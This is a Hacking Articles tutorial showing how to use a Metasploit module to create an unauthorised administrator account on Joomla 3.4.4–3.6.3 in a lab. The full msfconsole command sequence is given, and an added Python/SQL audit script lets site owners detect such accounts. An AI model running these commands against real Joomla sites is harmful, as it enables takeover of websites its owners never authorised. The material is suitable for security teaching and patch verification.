In this article we will learn about hacking Joomla CMS. To do so we will use a pre-installed Metasploit module that creates an arbitrary account with administrative privileges in Joomla versions 3.4.4 through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).
Exploit Targets
Joomla 3.4.4 through 3.6.3
Requirement
Attacker: Kali Linux
Victim PC: Joomla 3.4.4
Open a terminal in Kali and type msfconsole to start Metasploit.
Once Metasploit is open, type the following commands to execute the attack:
use auxiliary/admin/http/joomla_registration_privesc
msf auxiliary(joomla_registration_privesc) > set rhost 192.168.0.103
msf auxiliary(joomla_registration_privesc) > set username raj
msf auxiliary(joomla_registration_privesc) > set password raj123
msf auxiliary(joomla_registration_privesc) > set email raj@hackingarticles.in
msf auxiliary(joomla_registration_privesc) > set targeturi /joomla
msf auxiliary(joomla_registration_privesc) > exploit
This attack creates an account with a username and password of your choosing; in this case I have given username: raj and password: raj123, along with email ID: raj@hackingarticles.in.
A new user is then created with the username and password that you provided.
Having created the account, you can log in with that username.
Thus, you can hack Joomla CMS in the simplest of ways.
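A defender-side check for the outcome described above, as an added example that is not part of the original post: it tests whether an install falls in the affected 3.4.4 through 3.6.3 range and lists administrator-level accounts that are new, blocked, or awaiting activation. The `jos_` table prefix, group ids 7 and 8 (Joomla's default Administrator and Super Users groups), the activation-column convention, and the in-memory SQLite rows standing in for the site's database are assumptions.

```python
import sqlite3

# Assumption: default Joomla group ids (7 = Administrator, 8 = Super Users).
PRIVILEGED_GROUPS = (7, 8)

def affected(version):
    """True if a Joomla version is in the 3.4.4 through 3.6.3 range."""
    v = tuple(int(p) for p in version.split("."))
    return (3, 4, 4) <= v <= (3, 6, 3)

# Privileged accounts that are new since the cutoff, blocked, or not yet activated.
# Assumption: "jos_" table prefix; activation is '' or '0' once activated.
AUDIT_SQL = """
SELECT DISTINCT u.username, u.email, u.registerDate, u.block,
       u.activation NOT IN ('', '0') AS pending
FROM jos_users u
JOIN jos_user_usergroup_map m ON m.user_id = u.id
WHERE m.group_id IN (?, ?)
  AND (u.registerDate >= ? OR u.block = 1 OR u.activation NOT IN ('', '0'))
ORDER BY u.registerDate
"""

def suspicious_admins(conn, since):
    keys = ("username", "email", "registered", "blocked", "pending")
    rows = conn.execute(AUDIT_SQL, (*PRIVILEGED_GROUPS, since))
    return [dict(zip(keys, r)) for r in rows]

def sample_db():
    """Constructed rows in SQLite standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
    CREATE TABLE jos_users (id INTEGER PRIMARY KEY, username TEXT, email TEXT,
        block INTEGER, activation TEXT, registerDate TEXT);
    CREATE TABLE jos_user_usergroup_map (user_id INTEGER, group_id INTEGER);
    INSERT INTO jos_users VALUES
      (1, 'siteadmin', 'admin@example.test', 0, '', '2015-03-01 09:00:00'),
      (2, 'visitor', 'v@example.test', 1, 'c0ffee', '2016-11-02 10:15:00'),
      (3, 'unknown-admin', 'x@example.test', 1, 'deadbeef', '2016-11-02 10:16:00');
    INSERT INTO jos_user_usergroup_map VALUES (1, 8), (2, 2), (3, 7);
    """)
    return conn

if __name__ == "__main__":
    print("3.4.4 affected:", affected("3.4.4"))
    for row in suspicious_admins(sample_db(), "2016-10-01 00:00:00"):
        print(row)
```

Run the same query against the real database with the cutoff set to the date the site was last known to be clean; any privileged account the administrators do not recognise needs review.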
The post Exploiting Joomla Website using Account Creation and Privilege Escalation appeared first on Hacking Articles.